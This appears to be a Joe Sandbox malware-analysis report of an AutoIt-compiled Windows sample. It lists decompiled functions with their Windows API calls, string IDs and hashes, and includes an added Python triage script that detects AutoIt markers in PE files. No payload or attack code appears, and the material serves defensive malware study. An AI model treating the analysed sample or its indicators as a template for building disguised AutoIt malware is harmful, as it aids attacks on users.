                                • String ID: $AutoIt v3$DISPLAY$static
                                • API String ID: 2211948467-2373415609
                                • Opcode ID: 0d042a501a0d49509a198c1fc2472958503a2afdf14bdffe6848dac4ece5f6fe
                                • Instruction ID: a58721445416e1b57a08f870ddf9c4d7371eee91ae2df9fb325adb4ac545acb4
                                • Opcode Fuzzy Hash: 0d042a501a0d49509a198c1fc2472958503a2afdf14bdffe6848dac4ece5f6fe
                                • Instruction Fuzzy Hash: 04028D75900259EFDB14DFA8CD89FAE7BB9FB48310F008159F956AB2A0DB319D41CB60
                                APIs
                                • SetTextColor.GDI32(?,00000000), ref: 00CCD0EB
                                • GetSysColorBrush.USER32(0000000F), ref: 00CCD11C
                                • GetSysColor.USER32(0000000F), ref: 00CCD128
                                • SetBkColor.GDI32(?,000000FF), ref: 00CCD142
                                • SelectObject.GDI32(?,00000000), ref: 00CCD151
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD17C
                                • GetSysColor.USER32(00000010), ref: 00CCD184
                                • CreateSolidBrush.GDI32(00000000), ref: 00CCD18B
                                • FrameRect.USER32(?,?,00000000), ref: 00CCD19A
                                • DeleteObject.GDI32(00000000), ref: 00CCD1A1
                                • InflateRect.USER32(?,000000FE,000000FE), ref: 00CCD1EC
                                • FillRect.USER32(?,?,00000000), ref: 00CCD21E
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CCD249
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(00000012), ref: 00CCD3BE
                                  • Part of subcall function 00CCD385: SetTextColor.GDI32(?,?), ref: 00CCD3C2
                                  • Part of subcall function 00CCD385: GetSysColorBrush.USER32(0000000F), ref: 00CCD3D8
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(0000000F), ref: 00CCD3E3
                                  • Part of subcall function 00CCD385: GetSysColor.USER32(00000011), ref: 00CCD400
                                  • Part of subcall function 00CCD385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCD40E
                                  • Part of subcall function 00CCD385: SelectObject.GDI32(?,00000000), ref: 00CCD41F
                                  • Part of subcall function 00CCD385: SetBkColor.GDI32(?,00000000), ref: 00CCD428
                                  • Part of subcall function 00CCD385: SelectObject.GDI32(?,?), ref: 00CCD435
                                  • Part of subcall function 00CCD385: InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD454
                                  • Part of subcall function 00CCD385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCD46B
                                  • Part of subcall function 00CCD385: GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD480
                                  • Part of subcall function 00CCD385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCD4A8
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                • String ID:
                                • API String ID: 3521893082-0
                                • Opcode ID: 26f1d2643aca11e905c942a80e5874054c719322b4e4a8be8910cf7eebcd4c93
                                • Instruction ID: a052b28bd092dab4f2f0171aa27125601a725f2f9daa58b67da489bf0ae612b9
                                • Opcode Fuzzy Hash: 26f1d2643aca11e905c942a80e5874054c719322b4e4a8be8910cf7eebcd4c93
                                • Instruction Fuzzy Hash: 8C917DB2409341AFDB109F64DC88F6FBBA9FB85325F100A29F9639A1E0D771D944CB52
                                APIs
                                • DestroyWindow.USER32 ref: 00C64956
                                • DeleteObject.GDI32(00000000), ref: 00C64998
                                • DeleteObject.GDI32(00000000), ref: 00C649A3
                                • DestroyIcon.USER32(00000000), ref: 00C649AE
                                • DestroyWindow.USER32(00000000), ref: 00C649B9
                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 00CDE179
                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00CDE1B2
                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00CDE5E0
                                  • Part of subcall function 00C649CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C64954,00000000), ref: 00C64A23
                                • SendMessageW.USER32 ref: 00CDE627
                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00CDE63E
                                • ImageList_Destroy.COMCTL32(00000000), ref: 00CDE654
                                • ImageList_Destroy.COMCTL32(00000000), ref: 00CDE65F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                • String ID: 0
                                • API String ID: 464785882-4108050209
                                • Opcode ID: 6288e487a7e2eed547123fb379c949a791ea704573c969f96d4b4c1009e4f646
                                • Instruction ID: 441e2fda6923f2b75abcedc8243db98984910a75528197b2ef7784e369007931
                                • Opcode Fuzzy Hash: 6288e487a7e2eed547123fb379c949a791ea704573c969f96d4b4c1009e4f646
                                • Instruction Fuzzy Hash: F7128D30600241DFDB28EF14C8C4BAABBE5BF05304F54456AF6AACF262C731E956DB91
                                APIs
                                • DestroyWindow.USER32(00000000), ref: 00CBA42A
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00CBA4E9
                                • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00CBA527
                                • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00CBA539
                                • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00CBA57F
                                • GetClientRect.USER32(00000000,?), ref: 00CBA58B
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00CBA5CF
                                • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00CBA5DE
                                • GetStockObject.GDI32(00000011), ref: 00CBA5EE
                                • SelectObject.GDI32(00000000,00000000), ref: 00CBA5F2
                                • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00CBA602
                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CBA60B
                                • DeleteDC.GDI32(00000000), ref: 00CBA614
                                • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00CBA642
                                • SendMessageW.USER32(00000030,00000000,00000001), ref: 00CBA659
                                • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00CBA694
                                • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00CBA6A8
                                • SendMessageW.USER32(00000404,00000001,00000000), ref: 00CBA6B9
                                • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00CBA6E9
                                • GetStockObject.GDI32(00000011), ref: 00CBA6F4
                                • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00CBA6FF
                                • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00CBA709
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                • API String ID: 2910397461-517079104
                                • Opcode ID: a904c3b242af78ffe451951026a42f3e1eb45bea8c8f77e0745704866701587f
                                • Instruction ID: 0f63f01f983a1df52d6cafa95c344ccd716b4f6a87dacc8df9fefb9ba36406fa
                                • Opcode Fuzzy Hash: a904c3b242af78ffe451951026a42f3e1eb45bea8c8f77e0745704866701587f
                                • Instruction Fuzzy Hash: 7EA16075A00255BFEB24DBA4DD8AFAE7BB9EB14710F008114F615EB2E0D770AD41CB64
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 00CAE45E
                                • GetDriveTypeW.KERNEL32(?,00CFDC88,?,\\.\,00CFDBF0), ref: 00CAE54B
                                • SetErrorMode.KERNEL32(00000000,00CFDC88,?,\\.\,00CFDBF0), ref: 00CAE6B1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: ErrorMode$DriveType
                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                • API String ID: 2907320926-4222207086
                                • Opcode ID: 10b7837b2b8a1ec15cd0df9436b7ffe9bdca48d04804e8556a48d17b7313d3e4
                                • Instruction ID: 382b30730f140df6f46929e2d6090d91d4f3357da75e3309549652d1d4683a24
                                • Opcode Fuzzy Hash: 10b7837b2b8a1ec15cd0df9436b7ffe9bdca48d04804e8556a48d17b7313d3e4
                                • Instruction Fuzzy Hash: D251D83020830BFFC610DF19D895969B7B1BB6670CB104E19F456AB191DB60DF89EBD2
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: __wcsnicmp
                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                • API String ID: 1038674560-86951937
                                • Opcode ID: fd74d420297ee1bfea5899aa1dfd90492bd1ef716d83489de65cc97f5da5848e
                                • Instruction ID: 5fd37f23edc17a3e783aa1e2b0b1b44c1174d341d64b840d09fe4c3e2a503b45
                                • Opcode Fuzzy Hash: fd74d420297ee1bfea5899aa1dfd90492bd1ef716d83489de65cc97f5da5848e
                                • Instruction Fuzzy Hash: C3614B713003057BDB31BA248CC2FBA3399AF16744F144025FEA6A61C2EB50DB45D7B6
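The String IDs in the blocks above ("AutoIt v3" as the window class, "msctls_progress32", and the "#include", "#requireadmin", "#OnAutoItStartRegister" directive parser) are markers of the AutoIt v3 runtime; a sample that carries them is most likely a compiled AutoIt script wrapping the payload. The following triage check is an added example, not part of the Joe Sandbox report or of the analysed sample: it searches a PE image for those markers in both ASCII and UTF-16LE form (the runtime calls the W-variant APIs such as CreateWindowExW and GetDriveTypeW, so its strings are stored wide). The "AU3!EA06" tag is an assumption drawn from common AutoIt detection rules, not from this report, and the sample bytes built in demo() are constructed.

```python
"""Triage check for AutoIt-compiled PE files (added example, not report code).

Markers are taken from the String IDs listed in the report; "AU3!EA06" is an
extra, commonly used AutoIt script-resource tag and is an assumption here.
"""
import re
from typing import Dict, List

# Strings the Joe Sandbox report lists for the AutoIt runtime functions.
AUTOIT_MARKERS = (
    "AutoIt v3",
    "#OnAutoItStartRegister",
    "#requireadmin",
    "#include-once",
    "msctls_progress32",
    "AU3!EA06",  # assumption: script-resource tag used by many AutoIt rules
)

def find_markers(data: bytes) -> Dict[str, List[int]]:
    """Return {marker: sorted offsets} for every marker present as ASCII or UTF-16LE."""
    hits: Dict[str, List[int]] = {}
    for marker in AUTOIT_MARKERS:
        offsets: List[int] = []
        for enc in ("ascii", "utf-16-le"):
            needle = re.escape(marker.encode(enc))
            offsets.extend(m.start() for m in re.finditer(needle, data))
        if offsets:
            hits[marker] = sorted(offsets)
    return hits

def looks_like_autoit(data: bytes, min_markers: int = 2) -> bool:
    """True when at least min_markers distinct AutoIt markers occur in the image.

    Two distinct markers are required so that a single incidental string
    (e.g. "msctls_progress32", which any program with a progress bar uses)
    does not trigger the check on its own.
    """
    return len(find_markers(data)) >= min_markers

def scan_file(path: str) -> Dict[str, List[int]]:
    """Convenience wrapper: read a file from disk and report marker offsets."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())

# Constructed stand-in for a PE image: a DOS header stub, one wide string and
# one narrow string, padded with unrelated bytes. Not bytes from the sample.
CONSTRUCTED_SAMPLE = (
    b"MZ" + b"\x00" * 64
    + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    + b"#requireadmin\x00"
    + b"unrelated payload bytes"
)

def demo() -> Dict[str, List[int]]:
    """Run the check over the constructed image and return the marker hits."""
    return find_markers(CONSTRUCTED_SAMPLE)

if __name__ == "__main__":
    for marker, offsets in demo().items():
        print(f"{marker!r:28} at offsets {offsets}")
    print("AutoIt-compiled:", looks_like_autoit(CONSTRUCTED_SAMPLE))
```

The check is a prioritisation aid for the sample intake queue rather than a verdict: AutoIt itself is legitimate, so a hit should route the file to script extraction and the sandbox rather than to a block decision on its own.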
                                APIs
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00CCC598
                                • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00CCC64E
                                • SendMessageW.USER32(?,00001102,00000002,?), ref: 00CCC669
                                • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00CCC925
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Window
                                • String ID: 0
                                • API String ID: 2326795674-4108050209
                                • Opcode ID: 5a1b763cd3afa7c7abb8440746ae1b5c825579fd9e14f8a386fa2b49ede6621d
                                • Instruction ID: fabbd512b7953821188f0e527ae42ba485733a67c12aca247b2ef12153db4078
                                • Opcode Fuzzy Hash: 5a1b763cd3afa7c7abb8440746ae1b5c825579fd9e14f8a386fa2b49ede6621d
                                • Instruction Fuzzy Hash: 66F1CF71104341AFE7218F24C8C9FAABBE4FF49354F084A2DF5AD962A1C774DA41EB52
                                APIs
                                • CharUpperBuffW.USER32(?,?,00CFDBF0), ref: 00CC6245
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: BuffCharUpper
                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                • API String ID: 3964851224-45149045
                                • Opcode ID: 3ecc680bae7432e9bd3903833d10ad48e3135d3647fb06bb8b0ea449e2f4b2b6
                                • Instruction ID: 4b6f621a89ed70a555e5b086a74c4f4c8d179df70cc8eb2ad1ec671c84f38b3a
                                • Opcode Fuzzy Hash: 3ecc680bae7432e9bd3903833d10ad48e3135d3647fb06bb8b0ea449e2f4b2b6
                                • Instruction Fuzzy Hash: 1CC181742082019BCB14EF14C591FAE7796AF95354F18886CF8965B3E6CF20DE4BDB82
                                APIs
                                • GetSysColor.USER32(00000012), ref: 00CCD3BE
                                • SetTextColor.GDI32(?,?), ref: 00CCD3C2
                                • GetSysColorBrush.USER32(0000000F), ref: 00CCD3D8
                                • GetSysColor.USER32(0000000F), ref: 00CCD3E3
                                • CreateSolidBrush.GDI32(?), ref: 00CCD3E8
                                • GetSysColor.USER32(00000011), ref: 00CCD400
                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00CCD40E
                                • SelectObject.GDI32(?,00000000), ref: 00CCD41F
                                • SetBkColor.GDI32(?,00000000), ref: 00CCD428
                                • SelectObject.GDI32(?,?), ref: 00CCD435
                                • InflateRect.USER32(?,000000FF,000000FF), ref: 00CCD454
                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00CCD46B
                                • GetWindowLongW.USER32(00000000,000000F0), ref: 00CCD480
                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00CCD4A8
                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00CCD4CF
                                • InflateRect.USER32(?,000000FD,000000FD), ref: 00CCD4ED
                                • DrawFocusRect.USER32(?,?), ref: 00CCD4F8
                                • GetSysColor.USER32(00000011), ref: 00CCD506
                                • SetTextColor.GDI32(?,00000000), ref: 00CCD50E
                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00CCD522
                                • SelectObject.GDI32(?,00CCD0B5), ref: 00CCD539
                                • DeleteObject.GDI32(?), ref: 00CCD544
                                • SelectObject.GDI32(?,?), ref: 00CCD54A
                                • DeleteObject.GDI32(?), ref: 00CCD54F
                                • SetTextColor.GDI32(?,?), ref: 00CCD555
                                • SetBkColor.GDI32(?,?), ref: 00CCD55F
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                • String ID:
                                • API String ID: 1996641542-0
                                • Opcode ID: 1aa32ca26f96e37bc494525d08e504ab72e5f6d00eef11efe7e3a5079bae40f1
                                • Instruction ID: b957f140514ea23990be1940cc1de24a4449908152effb2006ee06c2b5dee97a
                                • Opcode Fuzzy Hash: 1aa32ca26f96e37bc494525d08e504ab72e5f6d00eef11efe7e3a5079bae40f1
                                • Instruction Fuzzy Hash: 54512D71901248BFDF10DFA4DC88FAE7B79FB08320F254515FA26AB2A1D7759A40DB50
                                APIs
                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00CCB5C0
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CCB5D1
                                • CharNextW.USER32(0000014E), ref: 00CCB600
                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00CCB641
                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00CCB657
                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00CCB668
                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00CCB685
                                • SetWindowTextW.USER32(?,0000014E), ref: 00CCB6D7
                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00CCB6ED
                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CCB71E
                                • _memset.LIBCMT ref: 00CCB743
                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00CCB78C
                                • _memset.LIBCMT ref: 00CCB7EB
                                • SendMessageW.USER32 ref: 00CCB815
                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CCB86D
                                • SendMessageW.USER32(?,0000133D,?,?), ref: 00CCB91A
                                • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCB93C
                                • GetMenuItemInfoW.USER32(?), ref: 00CCB986
                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00CCB9B3
                                • DrawMenuBar.USER32(?), ref: 00CCB9C2
                                • SetWindowTextW.USER32(?,0000014E), ref: 00CCB9EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
• Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                • String ID: 0
                                • API String ID: 1073566785-4108050209
                                • Opcode ID: 6d6f955a402c2db64daecacaeff80dab9adf8b1b82b055f64c0c072132c70624
                                • Instruction ID: c4f6e431ba983a8b3b8042d126ccaadb59dbe8bf4ff8bd0a7eedd77896ea17d7
                                • Opcode Fuzzy Hash: 6d6f955a402c2db64daecacaeff80dab9adf8b1b82b055f64c0c072132c70624
                                • Instruction Fuzzy Hash: DDE15E75900258AEDB219F91DC86FEE7BB8EF05714F10815AF92AAB290D7708E41DF60
                                APIs
                                • GetCursorPos.USER32(?), ref: 00CC7587
                                • GetDesktopWindow.USER32 ref: 00CC759C
                                • GetWindowRect.USER32(00000000), ref: 00CC75A3
                                • GetWindowLongW.USER32(?,000000F0), ref: 00CC7605
                                • DestroyWindow.USER32(?), ref: 00CC7631
                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00CC765A
                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00CC7678
                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00CC769E
                                • SendMessageW.USER32(?,00000421,?,?), ref: 00CC76B3
                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00CC76C6
                                • IsWindowVisible.USER32(?), ref: 00CC76E6
                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00CC7701
                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00CC7715
                                • GetWindowRect.USER32(?,?), ref: 00CC772D
                                • MonitorFromPoint.USER32(?,?,00000002), ref: 00CC7753
                                • GetMonitorInfoW.USER32 ref: 00CC776D
                                • CopyRect.USER32(?,?), ref: 00CC7784
                                • SendMessageW.USER32(?,00000412,00000000), ref: 00CC77EF
                                Strings
                                Similarity
                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                • String ID: ($0$tooltips_class32
                                • API String ID: 698492251-4156429822
                                • Opcode ID: 8896a18c805938d635302035185cf51a4b0c84b35f3e0812662a08c3bce0c5af
                                • Instruction ID: be470bd001595f19e5c8c4f37a4912941fc79843ae2e02c1d70913cb7941db49
                                • Opcode Fuzzy Hash: 8896a18c805938d635302035185cf51a4b0c84b35f3e0812662a08c3bce0c5af
                                • Instruction Fuzzy Hash: 4BB14871608341AFDB14DF64C985B6ABBE5FF88310F008A1DF59A9B291DB70E905CF92
                                APIs
                                • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00CA76ED
                                • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00CA7713
                                • _wcscpy.LIBCMT ref: 00CA7741
                                • _wcscmp.LIBCMT ref: 00CA774C
                                • _wcscat.LIBCMT ref: 00CA7762
                                • _wcsstr.LIBCMT ref: 00CA776D
                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00CA7789
                                • _wcscat.LIBCMT ref: 00CA77D2
                                • _wcscat.LIBCMT ref: 00CA77D9
                                • _wcsncpy.LIBCMT ref: 00CA7804
                                Strings
                                Similarity
                                • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                • API String ID: 699586101-1459072770
                                • Opcode ID: b03240edd600dcce7075904f41d9cd3382e3d5bbe6ee725ba580ceb51401e6f5
                                • Instruction ID: a51f492386b360d18e36b3b16ae83c242954f6285ee094da21abcaecfcbd275f
                                • Opcode Fuzzy Hash: b03240edd600dcce7075904f41d9cd3382e3d5bbe6ee725ba580ceb51401e6f5
                                • Instruction Fuzzy Hash: 04412772900205BEEB01B7609C8BEBF77ACEF16728F140165F901E70C2EB649A41E7B5
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7A839
                                • GetSystemMetrics.USER32(00000007), ref: 00C7A841
                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00C7A86C
                                • GetSystemMetrics.USER32(00000008), ref: 00C7A874
                                • GetSystemMetrics.USER32(00000004), ref: 00C7A899
                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00C7A8B6
                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00C7A8C6
                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00C7A8F9
                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00C7A90D
                                • GetClientRect.USER32(00000000,000000FF), ref: 00C7A92B
